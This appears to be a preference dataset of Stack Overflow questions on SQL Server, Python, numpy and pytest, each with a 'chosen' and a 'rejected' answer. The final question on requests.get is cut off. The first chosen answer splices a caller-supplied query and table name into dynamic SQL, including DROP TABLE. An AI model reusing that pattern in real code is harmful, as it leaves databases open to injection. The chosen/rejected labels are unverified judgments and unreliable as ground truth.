Prompt stringlengths 10 31k | Chosen stringlengths 3 29.4k | Rejected stringlengths 3 51.1k | Title stringlengths 9 150 | Tags listlengths 3 7 |
|---|---|---|---|---|
I want to create a SQL tabled-value function that will receive a query as n parameter through my API. In my function I want execute that query. The query will be a SELECT statement.
This is what I have done so far and what to achieve but it is not the correct way to do so.
```
CREATE FUNCTION CUSTOM_EXPORT_RESULTS (
@query varchar(max),
@guid uniqueidentifier,
@tableName varchar(200))
RETURNS TABLE
AS
RETURN
(
-- Execute query into a table
SELECT *
INTO @tableName
FROM (
EXEC(@query)
)
)
GO
```
Please suggest the correct way! | Try this one -
```
CREATE PROCEDURE dbo.sp_CUSTOM_EXPORT_RESULTS
@query NVARCHAR(MAX) = 'SELECT * FROM dbo.test'
, @guid UNIQUEIDENTIFIER
, @tableName VARCHAR(200) = 'test2'
AS BEGIN
SELECT @query =
REPLACE(@query,
'FROM',
'INTO [' + @tableName + '] FROM')
DECLARE @SQL NVARCHAR(MAX)
SELECT @SQL = '
IF OBJECT_ID (N''' + @tableName + ''') IS NOT NULL
DROP TABLE [' + @tableName + ']
' + @query
PRINT @SQL
EXEC sys.sp_executesql @SQL
RETURN 0
END
GO
```
Output -
```
IF OBJECT_ID (N'test2') IS NOT NULL
DROP TABLE [test2]
SELECT * INTO [test2] FROM dbo.test
``` | What I see in your question is encapsulation of:
* taking a dynamic SQL expression
* executing it to fill a parametrized table
Why do you want to have such an encapsulation?
First, this can have a negative impact on your database performance. Please read [this on EXEC() and sp\_executesql()](http://www.sommarskog.se/dynamic_sql.html#Introducing) . I hope your SP won't be called from multiple parts of your application, because this WILL get you into trouble, at least performance-wise.
Another thing is - how and where are you constructing your SQL? Obviously you do it somewhere else and it seems its manually created. If we're talking about a contemporary application, there are lot of OR/M solutions for this and manual construction of TSQL in runtime should be always avoided if possible. Not to mention EXEC is not guarding you against any form of SQL injection attacks. However, if all of this is a part of some database administration TSQL bundle, forget his paragraph.
At the end, if you want to simply load a new table from some existing table (or part of it) as a part of some administration task in TSQL, consider issuing a SELECT ... INTO ... This will create a new target table structure for you (omitting indexes and constraints) and copy the data. SELECT INTO will outperform INSERT INTO SELECT because [SELECT INTO gets minimally logged](http://msdn.microsoft.com/en-us/library/ms191244%28v=sql.105%29.aspx).
I hope this will get you (and others) at least a bit on the right track. | Send query as parameter to SQL function | [
"",
"sql",
"sql-server",
""
] |
I'm writing a simple code to calculate how much change is due, with print statements thrown in to check my values.
```
cost = float(raw_input('How much did your meal cost? > '))
payment = float(raw_input('How much did you pay? > '))
change = (payment - cost)
print change
if change < 0:
print 'You need to pay $%.2f more!' % (-change)
dollars, q, d, n, p = 0, 0, 0, 0, 0
change = float(change*100)
print change
if change> 100:
dollars = int(change/100)
change = change % 100
print change
if change >= 25:
q = int(change/25)
change = change % 25
print change
if change >= 10:
d = int(change/10)
change = change % 10
print change
if change >= 5:
n = int(change/5)
change = change % 5
print change
if change >= 1:
p = int(change/1)
else:
print "why doesn't this work?"
print p
print change
print 'you get %d dollars, %d quarters, %d dimes, %d nickels, and %d pennies!' % (dollars, q, d, n, p)
```
This returns:
How much did your meal cost? > 34.34
How much did you pay? > 40
5.66
566.0
66.0
16.0
6.0
1.0
why doesn't this work?
0
1.0
I can see that change = 1.0 before and after the pennies calculation, but
```
if change >= 1
```
still reads as false, and goes to the else statement. What's happening here and how can I fix it? | It's exactly as ignacio says. The easy fix would just be to throw in a line to round change to the second decimal place. Using a function to simplify things a little bit, your code becomes:
```
def get_change_and_coin(coin_amount, change):
change = round(change, 2)
return (change % coin_amount, int(change / coin_amount))
cost = float(raw_input('How much did your meal cost? > '))
payment = float(raw_input('How much did you pay? > '))
change = (payment - cost)
print change
if change < 0:
print 'You need to pay $%.2f more!' % (-change)
dollars, q, d, n, p = 0, 0, 0, 0, 0
dollars = int(change)
change = float(change*100)
(change, q) = get_change_and_coin(25, change)
(change, d) = get_change_and_coin(10, change)
(change, n) = get_change_and_coin(5, change)
(change, p) = get_change_and_coin(1, change)
print 'you get %d dollars, %d quarters, %d dimes, %d nickels, and %d pennies!' % (dollars, q, d, n, p)
```
Hope this helps! | Welcome to IEEE 754 floating point. Enjoy the [inaccuracies](http://en.wikipedia.org/wiki/Floating_point#Accuracy_problems). Use a fixed-point or integer mechanism if you want to avoid them. | Python code not working - confusion about if statement | [
"",
"python",
""
] |
I'm trying to figure out how to open up a file and then store it's contents into a dictionary using the Part no. as the key and the other information as the value. So I want it to look something like this:
```
{Part no.: "Description,Price", 453: "Sperving_Bearing,9900", 1342: "Panametric_Fan,23400",9480: "Converter_Exchange,93859"}
```
I was able to store the text from the file into a list, but I'm not sure how to assign more than one value to a key. I'm trying to do this without importing any modules. I've been using the basic str methods, list methods and dict methods. | For a `txt` file like so
```
453 Sperving_Bearing 9900
1342 Panametric_Fan 23400
9480 Converter_Exchange 93859
```
You can just do
```
>>> newDict = {}
>>> with open('testFile.txt', 'r') as f:
for line in f:
splitLine = line.split()
newDict[int(splitLine[0])] = ",".join(splitLine[1:])
>>> newDict
{9480: 'Converter_Exchange,93859', 453: 'Sperving_Bearing,9900', 1342: 'Panametric_Fan,23400'}
```
You can get rid of the `----...` line by just checking if `line.startswith('-----')`.
**EDIT** - If you are sure that the first two lines contain the same stuff, then you can just do
```
>>> testDict = {"Part no.": "Description,Price"}
>>> with open('testFile.txt', 'r') as f:
_ = next(f)
_ = next(f)
for line in f:
splitLine = line.split()
testDict[int(splitLine[0])] = ",".join(splitLine[1:])
>>> testDict
{9480: 'Converter_Exchange,93859', 'Part no.': 'Description,Price', 453: 'Sperving_Bearing,9900', 1342: 'Panametric_Fan,23400'}
```
This adds the first line to the `testDict` in the code and skips the first two lines and then continues on as normal. | You can read a file into a list of lines like this:
```
lines = thetextfile.readlines()
```
You can split a single line by spaces using:
```
items = somestring.split()
```
Here's a principial example how to store a list into a dictionary:
```
>>>mylist = [1, 2, 3]
>>>mydict = {}
>>>mydict['hello'] = mylist
>>>mydict['world'] = [4,5,6]
>>>print(mydict)
```
Containers like a tuple, list and dictionary can be nested into each other as their items.
To itereate a list you have to use a for statement like this:
```
for item in somelist:
# do something with the item like printing it
print item
``` | How to read and store values from a text file into a dictionary. [python] | [
"",
"python",
"string",
"list",
"dictionary",
"io",
""
] |
For a plot that I am making, I have:
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2}'.format(pname, mjd[i], rmslevel), fontsize=12, fontweight='bold')
```
I want the number that will appear in the place of {2} (aka rmslevel) to only show 2 decimal places.
I have seen similar questions to this of course, and the solutions:
```
print "%.1f" % number
```
But I can't figure out how to get this to work in the context of the .format things that I have going on in the same line.
Thank you! | You're looking for this.
```
>>> "{0:.2f}".format(123.678956) # Or "{:.2f}".format(123.678956)
'123.68'
```
Your code now turns to
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2:.2f}'.format(pname, mjd[i], rmslevel), fontsize=12, fontweight='bold')
```
You may find [this](http://docs.python.org/2/library/string.html#formatspec) useful.
[Python Docs](http://docs.python.org/2/library/string.html#formatexamples) contain some examples.
> In most of the cases the syntax is similar to the old %-formatting,
> with the addition of the {} and with : used instead of %. For example,
> '%03.2f' can be translated to '{:03.2f}'. | Maybe you can do this -
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2}'.format(
pname, mjd[i], ("%.2f" % rmslevel)
), fontsize=12, fontweight='bold')
``` | limit plot title to only show a certain number of decimal places | [
"",
"python",
""
] |
I am new to python and working on a few programs to get a hang of it.
I am making a palindrome program which takes input from a file and prints out the words that are palindromes. Here is the code i have so far
```
def isPalindrome(word):
if len(word) < 1:
return True
else:
if word[0] == word[-1]:
return isPalindrome(word[1:-1])
else:
return False
def fileInput(filename):
file = open(filename,'r')
fileContent = file.readlines()
if(isPalindrome(fileContent)):
print(fileContent)
else:
print("No palindromes found")
file.close()
```
this is the file
```
moom
mam
madam
dog
cat
bat
```
i get output of no palindromes found. | The contents of the file will be read in as a list, so fileContent will end up as:
```
fileContent = file.readlines()
fileContent => ["moon\n", "mam\n", "madam\n", "dog\n", "cat\n", "bat\n"]
```
you could fix this by:
```
def fileInput(filename):
palindromes = False
for line in open(filename):
if isPalindrome(line.strip()):
palindromes = True
print(line.strip(), " is a palindrome.")
return "palindromes found in {}".format(filename) if palindromes else "no palindromes found."
```
Note: have added the `palindromes` flag for the purposes of returning the final "palindromes [not] found" statement | There should be a loop on the words in the file. Also `readline` reads the end-of-line character too. You should `strip` it before calling isPalindrome. | Palindrome program in python using file i/o | [
"",
"python",
"python-3.x",
""
] |
I have a 60GB SciPy Array (Matrix) I must share between 5+ `multiprocessing` `Process` objects. I've seen numpy-sharedmem and read [this discussion](http://grokbase.com/t/python/python-list/1144s75ps4/multiprocessing-shared-memory-vs-pickled-copies) on the SciPy list. There seem to be two approaches--`numpy-sharedmem` and using a `multiprocessing.RawArray()` and mapping NumPy `dtype`s to `ctype`s. Now, `numpy-sharedmem` seems to be the way to go, but I've yet to see a good reference example. I don't need any kind of locks, since the array (actually a matrix) will be read-only. Now, due to its size, I'd like to avoid a copy. It *sounds like* the correct method is to create the *only* copy of the array as a `sharedmem` array, and then pass it to the `Process` objects? A couple of specific questions:
1. What's the best way to actually pass the sharedmem handles to sub-`Process()`es? Do I need a queue just to pass one array around? Would a pipe be better? Can I just pass it as an argument to the `Process()` subclass's init (where I'm assuming it's pickled)?
2. In the discussion I linked above, there's mention of `numpy-sharedmem` not being 64bit-safe? I'm definitely using some structures that aren't 32-bit addressable.
3. Are there tradeoff's to the `RawArray()` approach? Slower, buggier?
4. Do I need any ctype-to-dtype mapping for the numpy-sharedmem method?
5. Does anyone have an example of some OpenSource code doing this? I'm a very hands-on learned and it's hard to get this working without any kind of good example to look at.
If there's any additional info I can provide to help clarify this for others, please comment and I'll add. Thanks!
This needs to run on Ubuntu Linux and *Maybe* Mac OS, but portability isn't a huge concern. | @Velimir Mlaker gave a great answer. I thought I could add some bits of comments and a tiny example.
(I couldn't find much documentation on sharedmem - these are the results of my own experiments.)
1. Do you need to pass the handles when the subprocess is starting, or after it has started? If it's just the former, you can just use the `target` and `args` arguments for `Process`. This is potentially better than using a global variable.
2. From the discussion page you linked, it appears that support for 64-bit Linux was added to sharedmem a while back, so it could be a non-issue.
3. I don't know about this one.
4. No. Refer to example below.
### Example
```
#!/usr/bin/env python
from multiprocessing import Process
import sharedmem
import numpy
def do_work(data, start):
data[start] = 0;
def split_work(num):
n = 20
width = n/num
shared = sharedmem.empty(n)
shared[:] = numpy.random.rand(1, n)[0]
print "values are %s" % shared
processes = [Process(target=do_work, args=(shared, i*width)) for i in xrange(num)]
for p in processes:
p.start()
for p in processes:
p.join()
print "values are %s" % shared
print "type is %s" % type(shared[0])
if __name__ == '__main__':
split_work(4)
```
### Output
```
values are [ 0.81397784 0.59667692 0.10761908 0.6736734 0.46349645 0.98340718
0.44056863 0.10701816 0.67167752 0.29158274 0.22242552 0.14273156
0.34912309 0.43812636 0.58484507 0.81697513 0.57758441 0.4284959
0.7292129 0.06063283]
values are [ 0. 0.59667692 0.10761908 0.6736734 0.46349645 0.
0.44056863 0.10701816 0.67167752 0.29158274 0. 0.14273156
0.34912309 0.43812636 0.58484507 0. 0.57758441 0.4284959
0.7292129 0.06063283]
type is <type 'numpy.float64'>
```
This [related question](https://stackoverflow.com/questions/7894791/use-numpy-array-in-shared-memory-for-multiprocessing) might be useful. | If you are on Linux (or any POSIX-compliant system), you can define this array as a global variable. `multiprocessing` is using `fork()` on Linux when it starts a new child process. A newly spawned child process automatically shares the memory with its parent as long as it does not change it ([copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) mechanism).
Since you are saying "I don't need any kind of locks, since the array (actually a matrix) will be read-only" taking advantage of this behavior would be a very simple and yet extremely efficient approach: all child processes will access the same data in physical memory when reading this large numpy array.
Don't hand your array to the `Process()` constructor, this will instruct `multiprocessing` to `pickle` the data to the child, which would be extremely inefficient or impossible in your case. On Linux, right after `fork()` the child is an exact copy of the parent using the same physical memory, so all you need to do is making sure that the Python variable 'containing' the matrix is accessible from within the `target` function that you hand over to `Process()`. This you can typically achieve with a 'global' variable.
Example code:
```
from multiprocessing import Process
from numpy import random
global_array = random.random(10**4)
def child():
print sum(global_array)
def main():
processes = [Process(target=child) for _ in xrange(10)]
for p in processes:
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
main()
```
On Windows -- which does not support `fork()` -- `multiprocessing` is using the win32 API call `CreateProcess`. It creates an entirely new process from any given executable. That's why on Windows one is *required* to pickle data to the child if one needs data that has been created during runtime of the parent. | Share Large, Read-Only Numpy Array Between Multiprocessing Processes | [
"",
"python",
"numpy",
"multiprocessing",
"shared-memory",
""
] |
Given a Users table like so:
Users: id, created\_at
How can I get the # of users created grouped by day? My goal is to see the number of users created this Monday versus previous Monday's. | If `created_at` is of type `timestamp`, the simplest and fastest way is a plain cast to `date`:
```
SELECT created_at::date AS day, count(*) AS ct
FROM users
GROUP BY 1;
```
Since I am assuming that `id` cannot be `NULL`, `count(*)` is a tiny bit shorter and faster than `count(id)`, while doing the same.
If you just want to see days since **"last Monday"**:
```
SELECT created_at::date, count(*) AS ct
FROM users
WHERE created_at >= (now()::date - (EXTRACT(ISODOW FROM now())::int + 6))
GROUP BY 1
ORDER BY 1;
```
This is carefully drafted to use a [sargable](http://en.wikipedia.org/wiki/Sargable) condition, so it can use a simple index on `created_at` if present.
Consider the manual for [`EXTRACT`](http://www.postgresql.org/docs/current/interactive/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT). | ```
SELECT COUNT(id) AS cnt, EXTRACT(DOW FROM created_at) AS dow
FROM Users
GROUP BY EXTRACT(DAY FROM created_at)
``` | SQL grouping user count by Mondays | [
"",
"sql",
"postgresql",
""
] |
I work in a small company which is running M/S SQL Server 2005
Now our head office is asking me to give the whole database backup with the table schema in a single file of \*.sql
please help me to backup my database in a \*.sql including the table schema.
Thanks in advance. | Use SQL Server Management Studio
1. right click on your database and choose `Generate scripts...` and hit `Next`
2. choose `Script entire database and all database objects` and hit `Next`
3. choose `Save to file` and enter a path and a file name for your future sql script file. On the same screen choose `Advanced` and change the `Types of data to script` property value from `Schema only` to `Schema and data`. Hit `OK`. Hit `Next`.
4. and hit `Next` again.
*You can [download](http://www.microsoft.com/en-us/download/details.aspx?id=29062), install, and use SQL Server Management Studio that comes free with Microsoft® SQL Server® 2012 Express* for that | I would go out and download Microsoft SQL Server Management Studio Express.
<http://www.microsoft.com/en-us/download/details.aspx?id=8961>
It is free. You will be able to connect to the database, drill down into Databases, right click and under Tasks, pick Backup Database. Make sure you pick full...CHoose Disk as the place you want to write it to and Execute...Look thru your options as well...
Hope this helps! | Microsoft SQL Server 2005 backup the database in *.sql | [
"",
"sql",
"sql-server",
""
] |
I would like to sort the values of a dictionary (which are lists) based on one of the lists. For example say I have the dictionary:
```
data = {'AttrA':[2,4,1,3],'AttrB':[12,43,23,25],'AttrC':['a','d','f','z']}
```
and I would like to sort this based on the values associated with AttrA, such that:
```
data = {'AttrA':[1,2,3,4],'AttrB':[23,12,25,43],'AttrC':['f','a','z','d']}
```
Thank you in advance! | Sort each value in your dictionary based on the `data['AttrA']` source list, using `sorted()` and `zip()`, all in just 3 lines of code:
```
base = data['AttrA'] # keep a reference to the original sort order
for key in data:
data[key] = [x for (y,x) in sorted(zip(base, data[key]))]
```
Demo:
```
>>> data = {'AttrA': [2, 4, 1, 3], 'AttrB': [12, 43, 23, 25], 'AttrC': ['a', 'd', 'f', 'z']}
>>> base = data['AttrA']
>>> for key in data:
... data[key] = [x for (y,x) in sorted(zip(base, data[key]))]
...
>>> data
{'AttrB': [23, 12, 25, 43], 'AttrC': ['f', 'a', 'z', 'd'], 'AttrA': [1, 2, 3, 4]}
``` | ```
from operator import itemgetter
data = {'AttrA':[2,4,1,3],'AttrB':[12,43,23,25],'AttrC':['a','d','f','z']}
sort = itemgetter(*[i for i, v in sorted(enumerate(data['AttrA']), key=itemgetter(1))])
data = dict((k, list(sort(v))) for k, v in data.items())
```
Or a shorter but less efficient method of creating `sort`:
```
sort = itemgetter(*[data['AttrA'].index(v) for v in sorted(data['AttrA'])])
```
Result:
```
>>> data
{'AttrB': [23, 12, 25, 43], 'AttrC': ['f', 'a', 'z', 'd'], 'AttrA': [1, 2, 3, 4]}
```
This uses [`operator.itemgetter`](http://docs.python.org/2/library/operator.html#operator.itemgetter) to create a sorting function that grabs items from a sequence in the order determined by `data['AttrA']`, and then applying that sorting function to each value in the dictionary. | Sorting values of a dictionary based on a list | [
"",
"python",
"sorting",
"dictionary",
""
] |
I am unable to solve this loop structure problem in SQL. I have two DATETIME parameters: `@Departure` and `@Arrival`. I am adding `NumberofHaltHrs` I need to get looping of @Departure and @Arrival as below.
Let's say I have
```
@Departure= 13/01/01 00:00:00(YY/MM/DD) and
@Arrival= 13/01/10 02:00:00(YY/MM/DD)
NumofHaltHrs are like 2, 22, 26, 56 (this is a column of other table where I need to ass to result table)
```
Desired output:
```
@Departure @Arrival
13/01/01 00:00:00 13/01/01 02:00:00 //Adding NumOfHaltHrs (2Hrs )
13/01/01 02:00:00 13/01/02 00:00:00 //NumOfHaltHrs (22 Hrs)
13/01/02 00:00:00 13/01/03 02:00:00
13/01/03 02:00:00 13/01/05 08:00:00
13/01/05 08:00:00 ...
...
```
I need to insert @Departure,@Arrival,NumOfHaltHrs into Result Table where its structure is
```
JourneyDetailsTable: (JourneyID,HaltID,Departure,Arrival,NumOfHaltHrs)
Halt : HaltID,NumOfHaltDays
```
I tried looping but I could not get Arrival dates in Departure column. | **[Here is the SQLFiddel Demo](http://sqlfiddle.com/#!3/fb036/1)**
**Below is the Query :**
```
create table Halts (id int,NoOfHalts int)
Go
insert into halts values(1,2),(2,22),(3,2),(4,22)
Go
select DATEADD(hour,
T.sum - T.NoofHalts,
Convert(datetime,'23/07/2012 00:00:00',103)) as Deaprture,
DATEADD(hour,
T.sum,
Convert(datetime,'23/07/2012 00:00:00',103)) as Arrival ,NoofHalts
from (select top (select COUNT(*) from Halts)
t1.id,
t1.NoOfHalts,
SUM(t2.NoOfHalts) as sum
from Halts t1
inner join Halts t2 on t1.id >= t2.id
group by t1.id, t1.NoOfHalts
order by t1.id
) T
```
Add number of Halts entry in `Halts` table which you wants in Output. | Try this:
```
DECLARE @Departure DATETIME
SET
@Departure = '01/13/01 00:00:00'
CREATE TABLE #NumofHaltHrs(HaltTime INT, ID INT IDENTITY(1,1))
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(2)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(22)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(26)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(56)
DECLARE @UpdatedArrivalTime DATETIME, @NumberOfHaltRows INT, @NumberOfHaltRowsIndex INT
SET @UpdatedArrivalTime = @Departure
SET @NumberOfHaltRowsIndex = 1
SELECT
@NumberOfHaltRows = COUNT(ID)
FROM #NumofHaltHrs
CREATE TABLE #Schedule(DEPARTURE DATETIME, ARRIVAL DATETIME)
WHILE @NumberOfHaltRowsIndex <= @NumberOfHaltRows
BEGIN
DECLARE @HaltTime INT
SELECT
@HaltTime = HaltTime
FROM #NumofHaltHrs
WHERE ID = @NumberOfHaltRowsIndex
INSERT INTO #Schedule
VALUES
(@UpdatedArrivalTime, DATEADD(hour, @HaltTime, @UpdatedArrivalTime))
SET @UpdatedArrivalTime = DATEADD(hour, @HaltTime, @UpdatedArrivalTime)
SET @NumberOfHaltRowsIndex = @NumberOfHaltRowsIndex + 1
END
SELECT * FROM #Schedule
```
I don't know in which scenario you want to use it, so kindly check for performance if the data is huge. | Repetition of column values in next row, using SQL | [
"",
"sql",
"sql-server",
"sql-server-2008",
""
] |
Consider the following example query:
```
SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo
WHERE bazValue >= CURDATE() # <-- This doesn't work
```
How can I make the `bazValue` available later on in the query? I'd prefer this, since I believe that it's enough to maintain the code in one place if possible. | There are a couple of ways around this problem that you can use in MySQL:
By using an inline view (this should work in most other versions of SQL, too):
```
select * from
(SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo) buz
WHERE bazValue >= CURDATE()
```
By using a HAVING clause (using column aliases in HAVING clauses is specific to MySQL):
```
SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo
HAVING bazValue >= CURDATE()
``` | As documented under [Problems with Column Aliases](http://dev.mysql.com/doc/en/problems-with-alias.html):
> Standard SQL disallows references to column aliases in a `WHERE` clause. This restriction is imposed because when the `WHERE` clause is evaluated, the column value may not yet have been determined. For example, the following query is illegal:
>
> ```
> SELECT id, COUNT(*) AS cnt FROM tbl_name
> WHERE cnt > 0 GROUP BY id;
> ```
>
> The `WHERE` clause determines which rows should be included in the `GROUP BY` clause, but it refers to the alias of a column value that is not known until after the rows have been selected, and grouped by the `GROUP BY`.
You can however reuse the aliased expression, and if it uses deterministic functions the query optimiser will ensure that cached results are reused:
```
SELECT foo.bar,
DATEDIFF(
-- your arguments
) as bazValue
FROM foo
WHERE DATEDIFF(
-- your arguments
) >= CURDATE()
```
Alternatively, you can move the filter into a `HAVING` clause (where aliased columns will already have been calculated and are therefore available) - but performance will suffer as indexes cannot be used and the filter will not be applied until after results have been compiled. | Using AS value in later on in query | [
"",
"mysql",
"sql",
""
] |
In Python how can I write a generic function to generate the Cartesian product of the same set repeated n times without using recursion and without using the itertools package? The function should take two parameters: the set and the n times.
e.g.:
```
set1={'a','b'}
print({(x,y) for x in set1 for y in set1})
{('a', 'b'), ('b', 'a'), ('b', 'b'), ('a', 'a')}
print({(x,y,z) for x in set1 for y in set1 for z in set1})
{('b', 'a', 'b'), ('a', 'b', 'a'), ('a', 'a', 'a'), ('b', 'a', 'a'), ('a', 'a', 'b'), ('b', 'b', 'a'), ('b', 'b', 'b'), ('a', 'b', 'b')}
```
etc.
But also:
```
set2={'a','b','c'}
print({(x,y,z) for x in set2 for y in set2 for z in set2})
print({(w,x,y,z) for w in set2 for x in set2 for y in set2 for z in set2})
```
etc. | You can generalize the comprehension-based technique you're already using by iteratively building up the result:
```
def cartesian_product(s, dim):
if dim == 0:
return set()
res = [(e,) for e in s]
for i in range(dim - 1):
res = [e + (f,) for e in res for f in s]
return set(res)
ex = {1,2,3}
for i in range(4):
print cartesian_product(ex, i)
```
Output:
```
set([])
set([(2,), (3,), (1,)])
set([(1, 2), (3, 2), (1, 3), (3, 3), (3, 1), (2, 1), (2, 3), (2, 2), (1, 1)])
set([(1, 3, 2), (1, 3, 1), (3, 3, 1), (2, 3, 1), (3, 3, 3), (2, 3, 2), (3, 3, 2), (2, 3, 3), (3, 2, 2), (3, 1, 3), (3, 2, 3), (3, 1, 2), (1, 2, 1), (3, 1, 1), (3, 2, 1), (1, 2, 2), (1, 2, 3), (1, 1, 1), (2, 1, 2), (2, 2, 3), (2, 1, 3), (2, 2, 2), (2, 2, 1), (2, 1, 1), (1, 1, 2), (1, 1, 3), (1, 3, 3)])
``` | ```
def cartesian(A,n):
tmp1,tmp2 = [],[[]]
for k in range(n):
for i in A:
tmp1.extend([j+[i] for j in tmp2])
tmp1,tmp2 = [],tmp1
return tmp2
[In:1] A = [1,2,3] ; n = 1
[Out:1] [[1], [2], [3]]
[In:2] A = [1,2,3] ; n = 4
[Out:2] [[1, 1, 1], [2, 1, 1], [3, 1, 1], [1, 2, 1], [2, 2, 1], [3, 2, 1], [1, 3, 1],
[2, 3, 1], [3, 3, 1], [1, 1, 2], [2, 1, 2], [3, 1, 2], [1, 2, 2], [2, 2, 2],
[3, 2, 2], [1, 3, 2], [2, 3, 2], [3, 3, 2], [1, 1, 3], [2, 1, 3], [3, 1, 3],
[1, 2, 3], [2, 2, 3], [3, 2, 3], [1, 3, 3], [2, 3, 3], [3, 3, 3]]
``` | Cartesian product generic function in Python | [
"",
"python",
"for-loop",
"set",
"cartesian-product",
""
] |
having trouble with a multi-table query today. I tried writing it myself and it didn't seem to work, so I selected all of the columns in the Management Studio Design view. The code SHOULD work but alas it doesn't. If I run this query, it seems to just keep going and going. I left my desk for a minute and when I came back and stopped the query, it had returned something like 2,000,000 rows (there are only about 120,000 in the PODetail table!!):
```
SELECT PODetail.OrderNum, PODetail.VendorNum, vw_orderHistory.Weight, vw_orderHistory.StdSqft, vw_orderHistory.ReqDate, vw_orderHistory.City,
vw_orderHistory.State, FB_FreightVend.Miles, FB_FreightVend.RateperLoad
FROM PODetail CROSS JOIN
vw_orderHistory CROSS JOIN
FB_FreightVend
ORDER BY ReqDate
```
Not only that, but it seems that every record had an OrderNum of 0 which shouldn't be the case. So I tried to exclude it...
```
SELECT PODetail.OrderNum, PODetail.VendorNum, vw_orderHistory.Weight, vw_orderHistory.StdSqft, vw_orderHistory.ReqDate, vw_orderHistory.City,
vw_orderHistory.State, FB_FreightVend.Miles, FB_FreightVend.RateperLoad
FROM PODetail CROSS JOIN
vw_orderHistory CROSS JOIN
FB_FreightVend
WHERE PODetail.OrderNum <> 0
ORDER BY ReqDate
```
While it executes successfully (no errors), it also returns no records whatsoever. What's going on here? I'm also curious about the query's CROSS JOIN. When I tried writing this myself, I first used "WHERE PODetail.OrderNum = vw\_orderHistory.OrderNum" to join those tables but I got the same no results issue. When I tried using JOIN, I got errors regarding "multi-part identifier could not be bound." | A `cross join` returns a zillion records. The product of the number of records in each table . . . That might be 10,000 \* 100,000 \* 100 -- this is a big number.
The one caveat is when a table is empty. Then the rows in that table is 0 . . . and 0 times anything is 0. So no rows are returned. And, no rows might be returned quite quickly.
I think you need to learn what `join` really does in SQL. Then you need to reimplement this with the correct join conditions. Not only will the query run faster, but it will return accurate results. | Do not use cross joins especially on large tables. The link below will help.
<http://www.codinghorror.com/blog/2007/10/a-visual-explanation-of-sql-joins.html>
Also **multi-part identifier could not be bound.** means the column might not exist as defined. Verify the column exists, datatype and it's assigned name for join.
At condition <> 0 all non corresponding values from PODetail will be omited.
Use (Ordernumber <> 0 or Ordernumber is null) | SQL query either runs endlessly or returns no values | [
"",
"sql",
"sql-server",
""
] |
So I have a line of text like this getting read into my program:
```
00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000
```
And I want to split that in two at the first special character. Most of the time the line is split by the '@' symbol, but in some cases a different character comes up. ('~', '+', '#p', '#m', '%p', '=').
So far I have it working for the '@' character:
```
def split_pointer_part(self, line):
self.before_at, self.after_at = line.partition('@')[::2]
return self.before_at, self.after_at
```
How do I change this to work for the first one that shows up out of the list of special characters? | You can use a regular expression:
```
>>> import re
>>> line = "00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000"
>>> re.split(r'(?:#p|#m|%p|[@~+=])', line, 1)
['00001740 n 3 eintiteas aon\xc3\xa1n beith 003 ', ' 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000']
``` | Take a look at [re.split](http://docs.python.org/2/library/re.html#re.split). It works like the regular split but accepts a regular expression.
Example:
```
import re
string = "00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000"
print(re.split(r'\@|\~|\+|\#p|\#,|\%p|\=', string))
``` | Split a line at the first special character Python | [
"",
"python",
""
] |
I'm writing selenium tests, with a set of classes, each class containing several tests. Each class currently opens and then closes Firefox, which has two consequences:
* super slow, opening firefox takes longer than running the test in a class...
* crashes, because after firefox has been closed, trying to reopen it really quickly, from selenium, results in an 'Error 54'
I could solve the error 54, probably, by adding a sleep, but it would still be super slow.
So, what I'd like to do is reuse the same Firefox instances across *all* test classes. Which means I need to run a method before all test classes, and another method after all test classes. So, 'setup\_class' and 'teardown\_class' are not sufficient. | You might want to use a session-scoped "autouse" fixture:
```
# content of conftest.py or a tests file (e.g. in your tests or root directory)
@pytest.fixture(scope="session", autouse=True)
def do_something(request):
# prepare something ahead of all tests
request.addfinalizer(finalizer_function)
```
This will run ahead of all tests. The finalizer will be called after the last test finished. | Using session fixture as suggested by [hpk42](https://stackoverflow.com/a/17844938/347181) is great solution for many cases,
but fixture will run only after all tests are collected.
Here are two more solutions:
### conftest hooks
Write a [`pytest_configure`](https://docs.pytest.org/en/latest/reference/reference.html#pytest.hookspec.pytest_configure) or [`pytest_sessionstart`](https://docs.pytest.org/en/latest/reference/reference.html#pytest.hookspec.pytest_sessionstart) hook in your `conftest.py` file(see where to put conftest.py file [here](https://stackoverflow.com/a/34520971/248616))
```
# content of conftest.py
def pytest_configure(config):
"""
Allows plugins and conftest files to perform initial configuration.
This hook is called for every plugin and initial conftest
file after command line options have been parsed.
"""
def pytest_sessionstart(session):
"""
Called after the Session object has been created and
before performing collection and entering the run test loop.
"""
def pytest_sessionfinish(session, exitstatus):
"""
Called after whole test run finished, right before
returning the exit status to the system.
"""
def pytest_unconfigure(config):
"""
called before test process is exited.
"""
```
### pytest plugin
Create a [pytest plugin](https://docs.pytest.org/en/latest/writing_plugins.html) with `pytest_configure` and `pytest_unconfigure` hooks.
Enable your plugin in `conftest.py`:
```
# content of conftest.py
pytest_plugins = [
'plugins.example_plugin',
]
# content of plugins/example_plugin.py
def pytest_configure(config):
pass
def pytest_unconfigure(config):
pass
``` | How to run a method before all tests in all classes? | [
"",
"python",
"selenium",
"pytest",
""
] |
In my script, `requests.get` never returns:
```
import requests
print ("requesting..")
# This call never returns!
r = requests.get(
"http://www.some-site.example",
proxies = {'http': '222.255.169.74:8080'},
)
print(r.ok)
```
